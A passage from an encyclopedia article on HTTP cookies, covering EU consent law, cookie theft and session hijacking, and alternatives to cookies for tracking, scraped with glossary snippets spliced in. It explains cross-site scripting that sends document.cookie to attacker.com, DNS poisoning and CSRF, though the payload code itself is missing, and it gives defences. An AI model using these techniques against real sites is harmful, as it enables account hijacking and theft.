) tends to eliminate any negative effects of such cookie discovery.
[Miyazaki, Anthony D. (2008), "Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage," Journal of Public Policy & Marketing, 23 (Spring), 19–33]
The
United States
The United States of America (U.S.A. or USA), commonly known as the United States (U.S. or US) or America, is a country primarily located in North America. It consists of 50 states, a federal district, five major unincorporated territori ...
government has set strict rules on setting cookies in 2000 after it was disclosed that the White House
drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the
CIA
The Central Intelligence Agency (CIA ), known informally as the Agency and historically as the Company, is a civilian foreign intelligence service of the federal government of the United States, officially tasked with gathering, processing, ...
had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the
National Security Agency
The National Security Agency (NSA) is a national-level intelligence agency of the United States Department of Defense, under the authority of the Director of National Intelligence (DNI). The NSA is responsible for global monitoring, collect ...
(NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.
EU cookie directive
In 2002, the European Union launched the
Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment.
In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.
The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the
General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users devices. In a case decided under the Data Protection Directive however, the
Court of Justice of the European Union
The Court of Justice of the European Union (CJEU) (french: Cour de justice de l'Union européenne or "''CJUE''"; Latin: Curia) is the judicial branch of the European Union (EU). Seated in the Kirchberg quarter of Luxembourg City, Luxembour ...
later confirmed however that the previous law implied the same strong quality of consent as the current instrument.
In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.
It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995
and the GDPR (Recital 32).
The GDPR is specific that consent must be as 'easy to withdraw as to give',
meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.
It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.
The
Court of Justice of the European Union
The Court of Justice of the European Union (CJEU) (french: Cour de justice de l'Union européenne or "''CJUE''"; Latin: Curia) is the judicial branch of the European Union (EU). Seated in the Kirchberg quarter of Luxembourg City, Luxembour ...
has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis of
Privacy International
Privacy International (PI) is a UK-based registered charity that defends and promotes the right to privacy across the world. First formed in 1990, registered as a non-profit company in 2002 and as a charity in 2012, PI is based in London. Its c ...
argues that proper enforcement would "destroy the entire industry".
However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.
Academic studies and regulators both describe wide-spread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.
A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all. The UK regulator, the
Information Commissioner's Office
The Information Commissioner's Office (ICO) is a non-departmental public body which reports directly to the Parliament of the United Kingdom and is sponsored by the Department for Digital, Culture, Media and Sport (DCMS). It is the independe ...
, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the
Interactive Advertising Bureau
The Interactive Advertising Bureau (IAB) is an American advertising business organization that develops industry standards, conducts research, and provides legal support for the online advertising industry. The organization represents many of th ...
was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR
-Privacycompliance.'
Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.
A
W3C
The World Wide Web Consortium (W3C) is the main international standards organization for the World Wide Web. Founded in 1994 and led by Tim Berners-Lee, the consortium is made up of member organizations that maintain full-time staff working to ...
specification called
P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on the specification.
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both. In 2020, the
European Data Protection Board
The European Data Protection Board (EDPB) is a European Union independent body with juridical personality whose purpose is to ensure consistent application of the General Data Protection Regulation
The General Data Protection Regulation (GD ...
, composed of all EU data protection regulators, stated that cookie walls were illegal.
In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).
Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.
However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third party cookies.
Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.
Cookie theft and session hijacking
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Network eavesdropping
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over
unencrypted
In cryptography, plaintext usually means unencrypted information pending input into cryptographic algorithms, usually encryption algorithms. This usually refers to data that is transmitted or stored unencrypted.
Overview
With the advent of comp ...
open
Wi-Fi
Wi-Fi () is a family of wireless network protocols, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access, allowing nearby digital devices to exchange data by radio wav ...
). This traffic includes cookies sent on ordinary unencrypted
HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a
man-in-the-middle attack
In cryptography and computer security, a man-in-the-middle, monster-in-the-middle, machine-in-the-middle, monkey-in-the-middle, meddler-in-the-middle, manipulator-in-the-middle (MITM), person-in-the-middle (PITM) or adversary-in-the-middle (AiTM) ...
.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing
Transport Layer Security
Transport Layer Security (TLS) is a cryptographic protocol designed to provide communications security over a computer network. The protocol is widely used in applications such as email, instant messaging, and voice over IP, but its use in securi ...
(
HTTPS
Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is enc ...
protocol) to encrypt the connection. A server can specify the
Secure
flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.
Publishing false sub-domain: DNS cache poisoning
If an attacker is able to cause a
DNS server
A name server refers to the server component of the Domain Name System (DNS), one of the two principal namespaces of the Internet. The most important function of DNS servers is the translation (resolution) of human-memorable domain names (example. ...
to cache a fabricated DNS entry (called
DNS cache poisoning
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver's cache, causing the name server to return an incorrect result record, e.g ...
), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of
f12345.www.example.com
that points to the
IP address
An Internet Protocol address (IP address) is a numerical label such as that is connected to a computer network that uses the Internet Protocol for communication.. Updated by . An IP address serves two main functions: network interface ident ...
of the attacker's server. The attacker can then post an image URL from his own server (for example,
http://f12345.www.example.com/img_4_cookie.jpg
). Victims reading the attacker's message would download this image from
f12345.www.example.com
. Since
f12345.www.example.com
is a sub-domain of
www.example.com
, victims' browsers would submit all
example.com
-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of the
Internet Service Provider
An Internet service provider (ISP) is an organization that provides services for accessing, using, or participating in the Internet. ISPs can be organized in various forms, such as commercial, community-owned, non-profit, or otherwise privat ...
s for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge
[Wire]
Hack Obtains 9 Bogus Certificates for Prominent Websites
of obtaining the target website's TLS certificate from a
certificate authority
In cryptography, a certificate authority or certification authority (CA) is an entity that stores, signs, and issues digital certificates. A digital certificate certifies the ownership of a public key by the named subject of the certificate. Thi ...
, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cross-site scripting: cookie theft
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered
HTML
The HyperText Markup Language or HTML is the standard markup language for documents designed to be displayed in a web browser. It can be assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaSc ...
and
JavaScript
JavaScript (), often abbreviated as JS, is a programming language that is one of the core technologies of the World Wide Web, alongside HTML and CSS. As of 2022, 98% of websites use JavaScript on the client side for webpage behavior, of ...
content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message on
www.example.com
with the following link:
Click here!
When another user clicks on this link, the browser executes the piece of code within the
onclick
attribute, thus replacing the string
document.cookie
with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the
attacker.com
server. If the attacker's malicious posting is on an HTTPS website
https://www.example.com
, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
Cross-site scripting: proxy request
In older versions of many browsers, there were security holes in the implementation of the
XMLHttpRequest
XMLHttpRequest (XHR) is an API in the form of an object whose methods transfer data between a web browser and a web server. The object is provided by the browser's JavaScript environment. Particularly, retrieval of data from XHR for the purpos ...
API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the
same-origin policy. For example, a victim is reading an attacker's posting on
www.example.com
, and the attacker's script is executed in the victim's browser. The script generates a request to
www.example.com
with the proxy server
attacker.com
. Since the request is for
www.example.com
, all
example.com
cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted over
HTTPS
Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is enc ...
connections, and the HTTPS protocol dictates
end-to-end encryption
End-to-end encryption (E2EE) is a system of communication where only the communicating users can read the messages. In principle, it prevents potential eavesdroppers – including telecommunications service providers, telecom providers, Internet ...
(i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
Cross-site request forgery
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Cookiejacking
Cookiejacking is an attack against
Internet Explorer
Internet Explorer (formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE) is a series of graphical web browsers developed by Microsoft which was used in the Windows line of operating systems ( ...
which allows the attacker to steal
session cookie
HTTP cookies (also called web cookies, Internet cookies, browser cookies, or simply cookies) are small blocks of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's ...
s of a user by tricking a user into dragging an object across the screen.
Microsoft deemed the flaw low-risk because of "the level of required user interaction",
and the necessity of having a user already logged into the website whose cookie is stolen.
Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via
social engineering.
Drawbacks of cookies
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (
REST
Rest or REST may refer to:
Relief from activity
* Sleep
** Bed rest
* Kneeling
* Lying (position)
* Sitting
* Squatting position
Structural support
* Structural support
** Rest (cue sports)
** Armrest
** Headrest
** Footrest
Arts and enter ...
) software architectural style.
Inaccurate identification
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same
user account
A user is a person who utilizes a computer or network service.
A user often has a user account and is identified to the system by a username (or user name). Other terms for username include login name, screenname (or screen name), accoun ...
, computer, and browser.
Alternatives to cookies
Some of the operations that can be done using cookies can also be done using other mechanisms.
Authentication and session management
JSON Web Tokens
A
JSON Web Token
JSON Web Token (JWT, pronounced , same as the word "jot") is a proposed Internet standard for creating data with optional signature and/or optional encryption whose payload holds JSON that asserts some number of claims. The tokens are signe ...
(JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
HTTP authentication
The HTTP protocol includes the
basic access authentication
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent (e.g. a web browser) to provide a user name and password when making a request. In basic HTTP authentication, a request contains a header field i ...
and the
digest access authentication
Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials, such as username or password, with a user's web browser. This can be used to confirm the identity of a user before sending sensitive info ...
protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
URL (query string)
The
query string
A query string is a part of a uniform resource locator (URL) that assigns values to specified parameters. A query string commonly includes fields added to a base URL by a Web browser or other client application, for example as part of an HTML, cho ...
part of the
URL is the part that is typically used for this purpose, but other parts can be used as well. The
Java Servlet
A Jakarta Servlet (formerly Java Servlet) is a Java software component that extends the capabilities of a server. Although servlets can respond to many types of requests, they most commonly implement web containers for hosting web applicati ...
and
PHP
PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995. The PHP reference implementation is now produced by The PHP Group. ...
session mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by
e-mail
Electronic mail (email or e-mail) is a method of exchanging messages ("mail") between people using electronic devices. Email was thus conceived as the electronic (digital) version of, or counterpart to, mail, at a time when "mail" meant ...
, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page ''internal to the site'' the first time, and then visits the same page by coming from an ''external
search engine'' the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables
session fixation attacks,
referer
In HTTP, "" (a misspelling of Referrer) is an optional HTTP header field that identifies the address of the web page (i.e., the URI or IRI), from which the resource has been requested. By checking the referrer, the server providing the new web ...
logging attacks and other
security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use
web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide We ...
GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
window.name DOM property
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the
DOM Dom or DOM may refer to:
People and fictional characters
* Dom (given name), including fictional characters
* Dom (surname)
* Dom La Nena (born 1989), stage name of Brazilian-born cellist, singer and songwriter Dominique Pinto
* Dom people, an et ...
property
window.name
. This data can be used instead of session cookies. The technique can be coupled with
JSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window or
tab will initially have an empty
window.name
property when opened.
In some respects, this can be more secure than cookies due to the fact that its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks.
Tracking
IP address
Some users may be tracked based on the
IP address
An Internet Protocol address (IP address) is a numerical label such as that is connected to a computer network that uses the Internet Protocol for communication.. Updated by . An IP address serves two main functions: network interface ident ...
of the computer requesting the page. The server knows the IP address of the computer running the browser (or the
proxy
Proxy may refer to:
* Proxy or agent (law), a substitute authorized to act for another entity or a document which authorizes the agent so to act
* Proxy (climate), a measured variable used to infer the value of a variable of interest in climate ...
, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as
Tor
Tor, TOR or ToR may refer to:
Places
* Tor, Pallars, a village in Spain
* Tor, former name of Sloviansk, Ukraine, a city
* Mount Tor, Tasmania, Australia, an extinct volcano
* Tor Bay, Devon, England
* Tor River, Western New Guinea, Indonesia
Sc ...
, are designed to retain
Internet anonymity
Anonymity describes situations where the acting person's identity is unknown. Some writers have argued that namelessness, though technically correct, does not capture what is more centrally at stake in contexts of anonymity. The important idea he ...
, rendering tracking by IP address impractical, impossible, or a security risk.
ETag
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
ETags can be flushed in some browsers by clearing the
browser cache
A Web cache (or HTTP cache) is a system for optimizing the World Wide Web. It is implemented both client-side and server-side. The caching of multimedias and other files can result in less overall delay when browsing the Web.
Parts of the syste ...
.
Browser cache
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example,
var userId = 3243242;
). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
Browser fingerprint
A
browser fingerprint
A device fingerprint or machine fingerprint is information collected about the software and hardware of a remote computing device for the purpose of identification. The information is usually assimilated into a brief identifier using a fingerprinti ...
is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basic
web browser
A web browser is application software for accessing websites. When a user requests a web page from a particular website, the browser retrieves its files from a web server and then displays the page on the user's screen. Browsers are used o ...
configuration information has long been collected by
web analytics
Web analytics is the measurement, collection, analysis, and reporting of web data to understand and optimize web usage. Web analytics is not just a process for measuring web traffic but can be used as a tool for business and market research and ...
services in an effort to accurately measure real human
web traffic
Web traffic is the data sent and received by visitors to a website. Since the mid-1990s, web traffic has been the largest portion of Internet traffic. Sites monitor the incoming and outgoing traffic to see which parts or pages of their site are ...
and discount various forms of
click fraud
Click, Klick and Klik may refer to:
Airlines
* Click Airways, a UAE airline
* Clickair, a Spanish airline
* MexicanaClick, a Mexican airline
Art, entertainment, and media Fictional characters
* Klick (fictional species), an alien race in t ...
. With the assistance of
client-side scripting
A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. In server-side scripting, parameters determine how the assembly of every new web page proceeds, and includi ...
languages, collection of much more esoteric parameters is possible.
Assimilation of such information into a single string constitutes a device fingerprint. In 2010,
EFF
EFF or eff may refer to:
Politics
* Economic Freedom Fighters, a South African communist political party
* Economic Freedom Fund, an American political organization
* Election Fighting Fund, a British suffragist organization supporting the ear ...
measured at least 18.1 bits of
entropy
Entropy is a scientific concept, as well as a measurable physical property, that is most commonly associated with a state of disorder, randomness, or uncertainty. The term and the concept are used in diverse fields, from classical thermodynam ...
possible from browser fingerprinting.
Canvas fingerprinting
Canvas fingerprinting is one of a number of browser fingerprinting techniques for tracking online users that allow websites to identify and track visitors using the HTML5 canvas element instead of browser cookies or other similar means. The techni ...
, a more recent technique, claims to add another 5.7 bits.
Web storage
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
The
HTML5
HTML5 is a markup language used for structuring and presenting content on the World Wide Web. It is the fifth and final major HTML version that is a World Wide Web Consortium (W3C) recommendation. The current specification is known as the HTML ...
standard (which most modern web browsers support to some extent) includes a JavaScript API called
Web storage
Web storage, sometimes known as DOM storage (Document Object Model storage), is a standard JavaScript API provided by web browsers. It enables websites to store persistent data on users' devices similar to cookies, but with much larger capacity ...
that allows two types of storage: local storage and session storage. Local storage behaves similarly to
persistent cookies while session storage behaves similarly to
session cookies, except that session storage is tied to an individual tab/window's lifetime (AKA a page session), not to a whole browser session like session cookies.
Internet Explorer supports persistent information
in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example,
Adobe Flash
Adobe Flash (formerly Macromedia Flash and FutureSplash) is a multimedia software platform used for production of animations, rich web applications, desktop applications, mobile apps, mobile games, and embedded web browser video players. Fla ...
has
Local shared object
A local shared object (LSO), commonly called a Flash cookie (due to its similarity with an HTTP cookie), is a piece of data that websites that use Adobe Flash may store on a user's computer. Local shared objects have been used by all versions of ...
and
Microsoft Silverlight
Microsoft Silverlight is a discontinued application framework designed for writing and running rich web applications, similar to Adobe's runtime, Adobe Flash. A plugin for Silverlight is still available for a very small number of browsers. W ...
has Isolated storage.
See also
*
Session (computer science)
In computer science and networking in particular, a session is a time-delimited two-way link, a practical (relatively high) layer in the tcp/ip protocol enabling interactive expression and information exchange between two or more communication d ...
*
Secure cookie
Secure cookies are a type of HTTP cookie that have Secure attribute set, which limits the scope of the cookie to "secure" channels (where "secure" is defined by the user agent, typically web browser). When a cookie has the Secure attribute, the us ...
*
HTTP Strict Transport Security § Privacy issues
References
Sources
* Anonymous, 2011. Cookiejacking Attack Steals Website Access Credentials. Informationweek - Online, pp. Informationweek - Online, May 26, 2011.
External links
* , the current official specification for HTTP cookies
HTTP cookies Mozilla Developer Network
Using cookies via ECMAScript Mozilla Developer Network
*
Cookiesat the Electronic Privacy Information Center (EPIC)
Mozilla Knowledge-Base: Cookies*
ttps://www.youtube.com/watch?v=T1QEs3mdJoc Cookie Stealing-
Michael Pound
Check cookies for compliance with EU cookie directive
{{Authority control
Computer access control
Cookie
Internet privacy
Web security exploits
Wikipedia articles with ASCII art
Hacking (computer security)
Tracking